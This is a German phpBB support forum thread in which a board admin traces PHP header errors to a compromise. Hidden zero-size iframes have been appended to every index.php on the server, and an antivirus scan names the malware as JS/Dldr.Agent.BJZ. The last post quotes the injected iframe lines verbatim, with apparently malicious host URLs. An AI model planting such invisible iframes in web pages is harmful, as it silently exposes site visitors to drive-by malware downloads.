Seite 1 von 1

Echtes Problem nach Arbeit im Moderationsbereich

Verfasst: 30.09.2008 11:29
von xCapricorn
Hallo Jungs,

bin momentan echt am verzweifeln, weil ich die Ursache für das folgende nicht wirklich nachvollziehen kann. Per SuFu hab ich nun erstmal versucht über die Fehlermeldungen weiter zu kommen. Fehlanzeige, was z.b. die Dinge mit den Sprachdateien betrifft, die sind im Urzustand.

Habe Heute Morgen bei mir im Forum mehrere neue Kategorien angelegt und Unterforen. Zudem habe ich die gesamten alten Foren zuvor gelöscht und alle darin enthaltenen Beiträge in ein Passwort-geschütztes "Archiv" - Forum verschoben.
Theoretisch wollte ich aus diesem Archiv dann die noch benötigten Beiträge in die neuen Kategorien einfügen. Dies habe ich über den Moderationsbereich auch eine ganze weile gemacht, ca. 35-40 mal.
Das letzte, was ich gemacht habe, woran ich mich erinnern kann, 3 Beiträge markiert und den Befehl verschieben ausgesucht, Zielforum ausgewählt und bam. Nu is alles im Eimer. Ganz toll dabei, ich verwende den Style SubSilver, komplett auf meine Bedürftnisse vom Design angepasst, hier entspricht fast kein einziger Farbcode mehr dem Ursprung, auch Bilder nicht mehr. ES GIBT KEIN BACKUP. *Heul* Da ich die Veränderungen vor kurzem erst gemacht habe und ich Heute nur noch schnell die Sortierung ändern wollte hab ich dieses auf Heute Mittag geplant gehabt. Das kann ich mir jetzt vermutlich erstmal aufs Butterbrot streichen.

Unter dem Link
Beispiel
könnt Ihr Euch selbst ein Bild machen, alles verschoben, Schriftgröße völlig daneben, Umlaute weg etc.
Dasselbe in der Adminoberfläche, da komm ich nich mal mehr hin.
common.php bereits überschrieben, en-ordner in de-ordner umbenannt, nix gebracht.


ausgeloggt folgendes:

Code: Alles auswählen

[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3554: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3556: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3557: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3558: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)

beim einloggen kommt folgendes:

Code: Alles auswählen

<?php echo $version->URL; ?>[phpBB Debug] PHP Notice: in file *Pfadgeändert*/html/joomla/libraries/joomla/session/session.php on line 412: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file *Pfadgeändert*/html/joomla/libraries/joomla/session/session.php on line 412: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file *Pfadgeändert*/html/joomla/libraries/joomla/session/session.php on line 415: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)

Warning: Cannot modify header information - headers already sent by (output started at *Pfadgeändert*/html/joomla/distribution/includes/hooks/index.php:250) in *Pfadgeändert*/html/joomla/distribution/includes/functions.php on line 3554

Warning: Cannot modify header information - headers already sent by (output started at *Pfadgeändert*/html/joomla/distribution/includes/hooks/index.php:250) in *Pfadgeändert*/html/joomla/distribution/includes/functions.php on line 3556

Warning: Cannot modify header information - headers already sent by (output started at /*Pfadgeändert*/html/joomla/distribution/includes/hooks/index.php:250) in *Pfadgeändert*/html/joomla/distribution/includes/functions.php on line 3557

Warning: Cannot modify header information - headers already sent by (output started at *Pfadgeändert*/html/joomla/distribution/includes/hooks/index.php:250) in *Pfadgeändert*/html/joomla/distribution/includes/functions.php on line 3558
Im ACP

Code: Alles auswählen

[phpBB Debug] PHP Notice: in file /adm/index.php on line 150: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /adm/index.php on line 152: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /adm/index.php on line 153: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
[phpBB Debug] PHP Notice: in file /adm/index.php on line 154: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:250)
Wenn man genau hinsieht, es läuft ja ein Joomla inlusive der bekannten Bridge von rocketwerx. Diese Bridge hat im letzten Monat komplett Fehlerfrei gearbeitet, keinerlei Probleme.


OK, HABS. Jetzt passt mal obacht, keine Ahnung wie das geht, aber ich geh immer mehr der Vermutung nach, das jemand da fummelt:

Hab in sämtlichen index.php-Dateien, die auf dem Server liegen folgenden Anhang an das ent-tag ?>gefunden, sowohl in Joomla als auch in phpbb:

Code: Alles auswählen


?><iframe src="[url-entfernt-von-nickvergessen]" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Was zum Geier ist das? (wer vor allem) Und vor allem wer hat es rangehängt???
Ausserdem, ausgerechnet an Systemweit alle index.php's auf dem Server???



Hab da noch was zu gefunden:
Beitrag

Verfasst: 30.09.2008 11:35
von nickvergessen
Sieht so aus, als hättest du dir nen Exploit eingefangen.
Ist wohl ähnlich dem hier:
http://www.phpbb.de/viewtopic.php?t=147238

Verfasst: 30.09.2008 22:49
von xCapricorn
Dem ist wohl leider so. Habe mal den Scanbericht eingefügt, den mir mein Avira ausgespuckt hat.

Es handelt sich übrigens in allen Fällen um den Java-Scriptvirus JS/Dldr.Agent.BJZ


Desweiteren habe ich auf meinem U3-Stick noch folgendes gefunden:
Ad- oder Spyware ADSPY/AdSpy.Gen
Ende des Suchlaufs: Dienstag, 30. September 2008 18:01
Benötigte Zeit: 26:42 Minute(n)

Der Suchlauf wurde vollständig durchgeführt.

5270 Verzeichnisse wurden überprüft
63178 Dateien wurden geprüft
1253 Viren bzw. unerwünschte Programme wurden gefunden
0 Dateien wurden als verdächtig eingestuft
0 Dateien wurden gelöscht
0 Viren bzw. unerwünschte Programme wurden repariert
2506 Dateien wurden in die Quarantäne verschoben
0 Dateien wurden umbenannt
0 Dateien konnten nicht durchsucht werden
61925 Dateien ohne Befall
224 Archive wurden durchsucht
0 Warnungen
1253 Hinweise
84022 Objekte wurden beim Rootkitscan durchsucht
0 Versteckte Objekte wurden gefunden
Fazinierend, wie von zuerst 4 befallenen Dateien plötzlich so viele werden konnten. Zudem war am Schluss nicht mehr nur die Zeile

Code: Alles auswählen

<iframe src="[url-entfernt-von-nickvergessen]" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
inzwischen von Heute Mittag bis jetzt kurz vor dem gesamten Löschen meiner Arbeit von 3 Monaten (*schluchz*) hängen noch weitere Einträge in den Dateien, die lauten wie folgt:

Code: Alles auswählen

<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>